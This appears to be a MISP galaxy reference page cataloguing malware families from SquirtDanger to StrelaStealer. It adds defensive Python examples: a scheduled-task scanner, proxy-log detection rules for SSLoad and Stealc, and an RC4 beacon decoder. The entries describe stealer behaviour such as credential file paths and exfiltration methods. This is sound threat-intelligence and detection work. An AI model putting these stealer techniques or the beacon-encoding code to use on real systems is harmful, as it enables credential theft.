According to Palo Alto Networks, SquirtDanger is a commodity botnet malware family with a number of capabilities. The malware is written in C# and has multiple layers of embedded code. Once run on a system, it persists via a scheduled task set to run every minute. SquirtDanger uses raw TCP connections to a remote command-and-control (C2) server for network communications.
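The every-minute scheduled task is the part of that description a defender can check for directly. The following is an added example, not SquirtDanger code and not Palo Alto Networks tooling: it parses Task Scheduler XML (the format `schtasks /query /xml` exports), reports tasks whose repetition interval is one minute or shorter, and notes when the task's binary lives outside the usual system paths. The task names, commands, trusted-path list and sample XML are constructed for illustration.

```python
"""Flag Scheduled Task definitions whose trigger repeats every minute."""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumption: directories a legitimately installed task binary normally runs
# from. A command outside these is reported as an extra signal, not a verdict.
TRUSTED_PREFIXES = ("%windir%", "%systemroot%", "c:\\windows\\", "c:\\program files")

# Constructed samples: a benign weekly maintenance task and a task that
# re-launches a binary from a user-writable directory every minute.
SAMPLE_TASKS = {
    "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag": """<?xml version="1.0"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-01-01T03:00:00</StartBoundary>
      <ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek>
    </CalendarTrigger>
  </Triggers>
  <Actions><Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c</Arguments></Exec></Actions>
</Task>""",
    "\\Updater": """<?xml version="1.0"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT1M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2024-03-10T09:15:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions><Exec><Command>C:\\Users\\victim\\AppData\\Roaming\\svchost.exe</Command></Exec></Actions>
</Task>""",
}


def iso_duration_seconds(value: str) -> int:
    """Convert an ISO 8601 duration as used by Task Scheduler (PT1M, PT30S, P1DT2H) to seconds."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value.strip())
    if not m:
        raise ValueError(f"unsupported duration: {value!r}")
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def analyze_task(name: str, xml_text: str, max_interval: int = 60):
    """Return a finding dict if any trigger repeats at least every max_interval seconds, else None."""
    root = ET.fromstring(xml_text)
    commands = [c.text or "" for c in root.findall(".//t:Actions/t:Exec/t:Command", TASK_NS)]
    intervals = [
        iso_duration_seconds(e.text or "")
        for e in root.findall(".//t:Triggers/*/t:Repetition/t:Interval", TASK_NS)
    ]
    fast = [s for s in intervals if s <= max_interval]
    if not fast:
        return None
    untrusted = [c for c in commands if not c.lower().startswith(TRUSTED_PREFIXES)]
    return {
        "task": name,
        "interval_seconds": min(fast),
        "commands": commands,
        "untrusted_path": bool(untrusted),
    }


def scan_tasks(tasks: dict, max_interval: int = 60) -> list:
    """Run analyze_task over a {task_name: xml} mapping and keep only the findings."""
    return [f for f in (analyze_task(n, x, max_interval) for n, x in tasks.items()) if f]


if __name__ == "__main__":
    for finding in scan_tasks(SAMPLE_TASKS):
        print(finding)
```

On a live host, feed `scan_tasks` the output of `schtasks /query /xml` per task (or the XML files under `%windir%\System32\Tasks`); the one-minute threshold is deliberately narrow so that ordinary maintenance tasks do not trip it.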
Internal MISP references
UUID 858a2cdb-9c89-436a-b8d4-60c725c7ac63
which can be used as unique global reference for SquirtDanger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
sRDI
sRDI allows for the conversion of DLL files to position independent shellcode. It attempts to be a fully functional PE loader supporting proper section permissions, TLS callbacks, and sanity checks. It can be thought of as a shellcode PE loader strapped to a packed DLL.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular sRDI.
Known Synonyms |
---|
DAVESHELL |
Internal MISP references
UUID 90ee25aa-89a8-4d70-a4d8-aee44561a146
which can be used as unique global reference for sRDI
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.srdi - webarchive
- https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing - webarchive
- https://github.com/monoxgas/sRDI - webarchive
- https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/ - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight - webarchive
- https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SSHNET
Internal MISP references
UUID 7e0667e8-67fd-4b5f-a3e4-3ced4dcaac1e
which can be used as unique global reference for SSHNET
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sshnet - webarchive
- https://www.crowdstrike.com/blog/who-is-pioneer-kitten/ - webarchive
- https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SslMM
Internal MISP references
UUID 009db412-762d-4256-8df9-eb213be01ffd
which can be used as unique global reference for SslMM
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm - webarchive
- https://securelist.com/analysis/publications/69953/the-naikon-apt/ - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SSLoad
SSLoad is a Rust-based downloader that first emerged in January 2024 and is used to deliver secondary payloads. Early versions of the malware used a first-stage DLL that connected to a Telegram channel named 'SSLoad' to retrieve another URL. It then downloaded a compressed PE file using a hardcoded User-Agent (SSLoad/1.x) and Content-Type over HTTP. The downloaded file was then decompressed and executed directly in memory. The malware has since undergone several updates, including changes to the command-and-control (C2) communication and the supporting executables that load the malware. Recent versions of the malware bypass the first-stage DLL by loading SSLoad directly onto the victim's machine.
Internal MISP references
UUID 4eaafa4a-34a5-42f5-8f77-debb51b1e460
which can be used as unique global reference for SSLoad
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ssload - webarchive
- https://www.linkedin.com/feed/update/urn:li:activity:7185786751922192384/ - webarchive
- https://infosec.exchange/@spamhaus/113402246487904714 - webarchive
- https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-04-15-IOC-for-Contact-Forms-campaign-SSLoad-activity.txt - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stabuniq
Internal MISP references
UUID faa2196f-df4c-454c-995e-ded7864d5fa8
which can be used as unique global reference for Stabuniq
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StalinLocker
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular StalinLocker.
Known Synonyms |
---|
StalinScreamer |
Internal MISP references
UUID 8c38460b-fcfd-434e-b258-875854c6aff6
which can be used as unique global reference for StalinLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stampedo
Internal MISP references
UUID b1efbadf-26e5-4e35-8fd2-61642c30ecbf
which can be used as unique global reference for Stampedo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StarCruft
Internal MISP references
UUID acd8fc63-c22a-4c11-907e-33e358fdd293
which can be used as unique global reference for StarCruft
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StarLoader
Internal MISP references
UUID f1decba9-6b3b-4636-a2b6-2208e178591a
which can be used as unique global reference for StarLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StarsyPound
Internal MISP references
UUID 6df9bbd4-ab32-4d09-afdb-97eed274520a
which can be used as unique global reference for StarsyPound
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StartPage
Potentially unwanted program that changes the start page of browsers to induce ad impressions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular StartPage.
Known Synonyms |
---|
Easy Television Access Now |
Internal MISP references
UUID 033dbef5-eb51-4f7b-87e6-6dc4bef72841
which can be used as unique global reference for StartPage
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
STASHLOG
Malware that abuses the Common Log File System (CLFS) to store/hide a second stage payload via registry transaction files.
Internal MISP references
UUID 4a844c8c-996c-4562-bed4-0496d7838157
which can be used as unique global reference for STASHLOG
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.stashlog - webarchive
- https://twitter.com/ESETresearch/status/1433819369784610828 - webarchive
- https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html - webarchive
- https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques - webarchive
- https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StealBit
This is a stealer used by LockBit 2.0.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular StealBit.
Known Synonyms |
---|
Corrempa |
Internal MISP references
UUID b98c86d4-1eee-490e-a6f9-e9559322fec8
which can be used as unique global reference for StealBit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit - webarchive
- https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool - webarchive
- https://twitter.com/r3c0nst/status/1425875923606310913 - webarchive
- https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/ - webarchive
- https://securelist.com/new-ransomware-trends-in-2022/106457/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stealc
Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and RedLine.
Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
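Two of the behaviours on this page leave traces in ordinary HTTP proxy logs: the hardcoded `SSLoad/1.x` User-Agent of early SSLoad versions (see the SSLoad entry above) and Stealc's fetch of seven legitimate support DLLs followed by file-by-file HTTP POST exfiltration. The triage script below is an added example, not code from SSLoad, Stealc, Sekoia or any other vendor. It applies three rules over a constructed, simplified log format: the SSLoad User-Agent prefix, a GET for one of the seven DLL names from a host outside an allowlist (the allowlist is an assumption), and a client POSTing repeatedly to a single host. The log lines, hosts and threshold are constructed.

```python
"""Triage HTTP proxy logs for SSLoad User-Agent and Stealc DLL-fetch / POST-burst patterns."""
import re
from collections import Counter

# Constructed log format: "<ts> <client> <method> <url> <status> \"<user-agent>\""
LINE_RE = re.compile(r'^(\S+) (\S+) (GET|POST|PUT|HEAD) (\S+) (\d{3}) "([^"]*)"$')

# Rule 1: hardcoded User-Agent of early SSLoad versions (SSLoad/1.x).
SSLOAD_UA_RE = re.compile(r"^SSLoad/1\.\d+")

# Rule 2: the seven legitimate DLLs Stealc downloads to read browser databases.
STEALC_DLLS = {
    "sqlite3.dll", "nss3.dll", "vcruntime140.dll", "mozglue.dll",
    "freebl3.dll", "softokn3.dll", "msvcp140.dll",
}
# Assumption: hosts from which these DLLs are expected to be fetched legitimately.
DLL_ALLOWLIST = {"download.mozilla.org", "aka.ms"}

# Rule 3: this many POSTs from one client to one host counts as a burst (assumed threshold).
POST_BURST = 5

# Constructed sample log. TEST-NET-2 addresses stand in for attacker hosts.
SAMPLE_LOG = """\
2024-04-15T10:00:01Z 10.0.0.5 GET http://cdn.example/update/pkg.bin 200 "SSLoad/1.0"
2024-04-15T10:00:02Z 10.0.0.7 GET https://download.mozilla.org/pub/firefox/sqlite3.dll 200 "Mozilla/5.0"
2024-04-15T10:00:03Z 10.0.0.9 GET http://198.51.100.10/sqlite3.dll 200 "Mozilla/5.0"
2024-04-15T10:00:04Z 10.0.0.9 GET http://198.51.100.10/nss3.dll 200 "Mozilla/5.0"
2024-04-15T10:00:05Z 10.0.0.9 POST http://198.51.100.10/upload 200 "Mozilla/5.0"
2024-04-15T10:00:06Z 10.0.0.9 POST http://198.51.100.10/upload 200 "Mozilla/5.0"
2024-04-15T10:00:07Z 10.0.0.9 POST http://198.51.100.10/upload 200 "Mozilla/5.0"
2024-04-15T10:00:08Z 10.0.0.9 POST http://198.51.100.10/upload 200 "Mozilla/5.0"
2024-04-15T10:00:09Z 10.0.0.9 POST http://198.51.100.10/upload 200 "Mozilla/5.0"
2024-04-15T10:00:20Z 10.0.0.7 POST https://mail.example/api/send 200 "Mozilla/5.0"
"""


def parse_line(line: str):
    """Split one log line into fields; return None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, ua = m.groups()
    host = re.sub(r"^https?://", "", url).split("/", 1)[0].lower()
    path = url.split("?", 1)[0]
    return {
        "ts": ts, "client": client, "method": method, "url": url, "host": host,
        "file": path.rsplit("/", 1)[-1].lower(), "status": int(status), "ua": ua,
    }


def triage(lines) -> list:
    """Return (rule, client, detail) tuples: per-line hits first, then POST-burst hits."""
    findings = []
    posts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if SSLOAD_UA_RE.match(rec["ua"]):
            findings.append(("ssload_user_agent", rec["client"], rec["url"]))
        if rec["method"] == "GET" and rec["file"] in STEALC_DLLS and rec["host"] not in DLL_ALLOWLIST:
            findings.append(("stealc_support_dll_fetch", rec["client"], rec["url"]))
        if rec["method"] == "POST":
            posts[(rec["client"], rec["host"])] += 1
    for (client, host), n in posts.items():
        if n >= POST_BURST:
            findings.append(("post_burst_exfil", client, f"{host} ({n} POSTs)"))
    return findings


if __name__ == "__main__":
    for rule, client, detail in triage(SAMPLE_LOG.splitlines()):
        print(f"{rule:26} {client:12} {detail}")
```

Rule 2 deliberately keys on file name rather than URL, because the DLLs are legitimate binaries and the only anomaly is where they are fetched from; rule 3 is a coarse heuristic that should be narrowed with a time window and a baseline of the client's normal POST targets before it is used for alerting.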
Internal MISP references
UUID 58a2c661-470e-438d-bea3-bff1ed987ed2
which can be used as unique global reference for Stealc
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc - webarchive
- https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ - webarchive
- https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets - webarchive
- https://www.vmray.com/cyber-security-blog/stealc-a-new-stealer-emerges-in-2023/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://any.run/cybersecurity-blog/crackedcantil-breakdown/ - webarchive
- https://cocomelonc.github.io/book/2023/12/13/malwild-book.html - webarchive
- https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_string_decryption.py - webarchive
- https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af - webarchive
- https://www.youtube.com/watch?v=-1nVs-O1ubw - webarchive
- https://github.com/echocti/ECHO-Reports/blob/main/Malware%20Analysis%20Report/StealC/StealC_Technical_Analysis_Report.pdf - webarchive
- https://securelist.com/tusk-infostealers-campaign/113367/ - webarchive
- https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_config_extractor.ipynb - webarchive
- https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ - webarchive
- https://glyc3rius.github.io/2023/10/stealc/ - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stealerium
According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as running processes, desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP addresses. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes and malware analysis tools, and checking whether the process is being debugged. The malware also embeds a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor's addresses when the victim makes a transaction. The stolen information is sent to a Discord channel via a Discord webhook.
Internal MISP references
UUID bf71f246-7382-486d-996d-c2b7aa8cf89b
which can be used as unique global reference for Stealerium
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stealer0x3401
According to PTSecurity, this stealer harvests system information which is then RC4 encrypted and Base64 encoded before sending it to the C2 server.
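That RC4-then-Base64 layering is simple enough that an analyst can decode a captured beacon by hand once the key is known, and sweep candidate keys when it is not. The block below is an added example, not code from the stealer or from PT Security: it implements RC4 (KSA and PRGA), the stealer-side encode and the analyst-side decode, and a key sweep that keeps only candidates yielding printable output. The key, the plaintext record and the captured blob are constructed; the real key must be recovered from the sample itself.

```python
"""Decode a Stealer0x3401-style beacon: Base64 over RC4-encrypted system information."""
import base64
import string


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def encode_beacon(key: bytes, plaintext: bytes) -> str:
    """Stealer-side layering as described on the page: RC4, then Base64."""
    return base64.b64encode(rc4(key, plaintext)).decode("ascii")


def decode_beacon(key: bytes, blob: str) -> bytes:
    """Analyst-side inverse; tolerates Base64 whose '=' padding was stripped in transit."""
    blob = blob.strip()
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    return rc4(key, raw)


PRINTABLE = set(string.printable.encode())


def looks_like_text(data: bytes, threshold: float = 0.95) -> bool:
    """True when nearly every byte is printable ASCII, i.e. a plausible decrypted record."""
    return bool(data) and sum(b in PRINTABLE for b in data) / len(data) >= threshold


def sweep_keys(blob: str, candidates) -> list:
    """Try each candidate key; return (key, plaintext) pairs whose output looks like text."""
    hits = []
    for key in candidates:
        try:
            pt = decode_beacon(key, blob)
        except ValueError:                    # empty key or malformed Base64
            continue
        if looks_like_text(pt):
            hits.append((key, pt))
    return hits


# Constructed: a hypothetical key and a system-information record of the kind
# the stealer collects. Neither value comes from a real sample.
SAMPLE_KEY = b"hypothetical-key"
SAMPLE_INFO = b"os=Windows 10 Pro|user=alice|host=DESKTOP-01|arch=x64|av=none"
SAMPLE_BLOB = encode_beacon(SAMPLE_KEY, SAMPLE_INFO)

if __name__ == "__main__":
    print("captured blob:", SAMPLE_BLOB)
    for key, pt in sweep_keys(SAMPLE_BLOB, [b"wrong", b"0x3401", SAMPLE_KEY]):
        print("key", key, "->", pt.decode())
```

`sweep_keys` is the analyst's entry point: feed it the Base64 blob from the capture and whatever key candidates the binary's strings or configuration suggest; a wrong RC4 key produces byte noise, so the printability filter discards it reliably.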
Internal MISP references
UUID b30b8058-45d9-45aa-8a1f-c6abc78edef8
which can be used as unique global reference for Stealer0x3401
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
STEALHOOK
Internal MISP references
UUID 8bc60b62-05f0-44bc-8edc-cbdcafe242d0
which can be used as unique global reference for STEALHOOK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StealthWorker Go
According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before attackers can embed a skimmer, however, they first need access to the target's backend. Attackers commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry. Another, simpler option is a brute-force attack: though slow, it is still effective against administrators who use weak or commonly used passwords.
Internal MISP references
UUID d1c5a299-c072-44b5-be31-d03853bca5ea
which can be used as unique global reference for StealthWorker Go
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker - webarchive
- https://www.bleepingcomputer.com/news/security/synology-warns-of-malware-infecting-nas-devices-with-ransomware/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stealth Soldier
Check Point Research observed a wave of highly-targeted espionage attacks in Libya that utilize a new custom modular backdoor. Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information.
Internal MISP references
UUID 07a24653-0f0b-49cf-944d-b4686b7e48d0
which can be used as unique global reference for Stealth Soldier
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SteamHide
Malware written in .NET that hides in Steam profile pictures. It attempts to evade analysis in virtualized environments by detecting whether it is being executed within VMware or VirtualBox.
Internal MISP references
UUID 4729fb59-44a8-4d2f-9914-cd93fc528888
which can be used as unique global reference for SteamHide
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StegoLoader
Internal MISP references
UUID aea21616-061d-4177-9512-8887853394ed
which can be used as unique global reference for StegoLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stinger
Internal MISP references
UUID 82ab5235-a71e-4692-a08c-8db337d8b53a
which can be used as unique global reference for Stinger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
STONEBOAT
According to Mandiant, STONEBOAT is an installer for DICELOADER. It is written in .NET and drops its payload in-memory.
Internal MISP references
UUID c4286ab0-748a-4473-b4a6-ac4426f73393
which can be used as unique global reference for STONEBOAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StoneDrill
Internal MISP references
UUID 0c5bc5c8-5136-413a-bc5a-e13333271f49
which can be used as unique global reference for StoneDrill
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.stonedrill - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
STOP
STOP (Djvu) is a ransomware that encrypts user data with AES-256 and appends one of a dozen available extensions to the encrypted file's name as a marker. It does not encrypt the entire file, only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular STOP.
Known Synonyms |
---|
Djvu |
KeyPass |
Internal MISP references
UUID 447e5d7d-dd23-43b3-8cbc-b835498a49dd
which can be used as unique global reference for STOP
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.stop - webarchive
- https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a - webarchive
- https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://glyc3rius.github.io/2024/02/stop/ - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
- https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware - webarchive
- https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore - webarchive
- https://drive.google.com/file/d/1L8mkylrCJyd-817-45RA6gIFCCX4oaOv/view - webarchive
- https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/ - webarchive
- https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/ - webarchive
- https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list - webarchive
- https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://securelist.com/keypass-ransomware/87412/ - webarchive
- https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/ - webarchive
- https://any.run/cybersecurity-blog/crackedcantil-breakdown/ - webarchive
- https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b - webarchive
- https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://www.gdatasoftware.com/blog/2022/01/malware-vaccines - webarchive
- https://angle.ankura.com/post/102het9/the-stop-ransomware-variant - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stormwind
Internal MISP references
UUID 98d5a891-f4dd-4c87-a019-1f1e7ab59301
which can be used as unique global reference for Stormwind
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
STOWAWAY
According to Mandiant, STOWAWAY is a publicly available backdoor and proxy. The project supports several communication types, such as SSH and SOCKS5. The backdoor component supports file upload and download, a remote shell, and basic information gathering.
Internal MISP references
UUID cd187108-c557-42f8-8e48-1993abb37720
which can be used as unique global reference for STOWAWAY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stration
Internal MISP references
UUID 0439c5ec-306e-4473-84f7-50bdb5539fc2
which can be used as unique global reference for Stration
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
STRATOFEAR
Internal MISP references
UUID a968a42e-4162-46db-a96e-2a45927d1cd7
which can be used as unique global reference for STRATOFEAR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StrelaStealer
According to PCRisk, StrelaStealer seeks to extract email account log-in credentials. At the time of writing, this program targets Microsoft Outlook and Mozilla Thunderbird email clients.
Following successful infiltration, StrelaStealer searches for "logins.json" (account/password) and "key4.db" (password database) within the "%APPDATA%\Thunderbird\Profiles\" directory; by doing so, it can acquire the credentials for Thunderbird.
Alternatively, if Outlook credentials are targeted, StrelaStealer searches the Windows Registry, from which it retrieves the program's key and the "IMAP User", "IMAP Server", and "IMAP Password" values. Since the latter is stored in encrypted form, the malicious program uses the Windows CryptUnprotectData function to decrypt it prior to exfiltration.
Internal MISP references
UUID 17f84079-56b8-4be5-bc59-75c8526b0ce0
which can be used as unique global reference for StrelaStealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer - webarchive
- https://blog.sonicwall.com/en-us/2024/04/updated-strelastealer-targeting-european-countries/ - webarchive
- https://research.openanalysis.net/strelastealer/stealer/2023/05/07/streala.html - webarchive
- https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc - webarchive
- https://unit42.paloaltonetworks.com/strelastealer-campaign/ - webarchive
- https://blog.sonicwall.com/en-us/2024/06/strelastealer-resurgence-tracking-a-javascript-driven-credential-stealer-targeting-europe/ - webarchive
